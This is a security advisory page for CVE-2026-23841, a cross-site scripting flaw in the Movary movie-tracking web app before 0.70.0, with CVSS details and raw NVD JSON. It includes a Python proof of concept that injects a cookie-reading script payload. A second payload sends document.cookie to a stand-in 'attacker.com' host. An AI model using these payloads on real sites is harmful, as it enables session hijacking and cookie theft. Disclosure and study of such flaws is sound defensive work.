Security Vulnerability Report
中文
CVE-2026-23841 CVSS 9.3 CRITICAL

CVE-2026-23841

Published: 2026-01-19 19:16:04
Last Modified: 2026-02-02 15:17:07

Description

Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryCreated=`. Version 0.70.0 fixes the issue.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:leepeuker:movary:*:*:*:*:*:*:*:* - VULNERABLE
Movary < 0.70.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-23841 PoC - Movary XSS via categoryCreated parameter # Target: Movary < 0.70.0 target_url = "http://target-website.com" # Replace with actual target # Malicious XSS payload xss_payload = "<script>alert(document.cookie)</script>" # Inject XSS payload via categoryCreated parameter injection_url = f"{target_url}/?categoryCreated={requests.utils.quote(xss_payload)}" print(f"[*] Sending XSS payload to: {injection_url}") try: response = requests.get(injection_url, timeout=10) if xss_payload in response.text: print("[+] Payload successfully stored!") print("[+] XSS vulnerability confirmed - payload reflected in response") else: print("[-] Payload not found in response") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Alternative PoC with event handler alt_payload = '" onerror="fetch(\'http://attacker.com/steal?c=\'+document.cookie)' alt_url = f"{target_url}/?categoryCreated={requests.utils.quote(alt_payload)}" print(f"[*] Alternative payload URL: {alt_url}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23841", "sourceIdentifier": "[email protected]", "published": "2026-01-19T19:16:04.370", "lastModified": "2026-02-02T15:17:06.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryCreated=`. Version 0.70.0 fixes the issue."}, {"lang": "es", "value": "Movary es una aplicación web para rastrear, calificar y explorar tu historial de películas vistas. Debido a una validación de entrada insuficiente, los atacantes pueden activar cargas útiles de cross-site scripting en versiones anteriores a la 0.70.0. El parámetro vulnerable es '?categoryCreated='. La versión 0.70.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leepeuker:movary:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.70.0", "matchCriteriaId": "97791827-BE81-4574-9CDC-B0033B5ADE68"}]}]}], "references": [{"url": "https://github.com/leepeuker/movary/releases/tag/0.70.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/leepeuker/movary/security/advisories/GHSA-v877-x568-4v5v", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}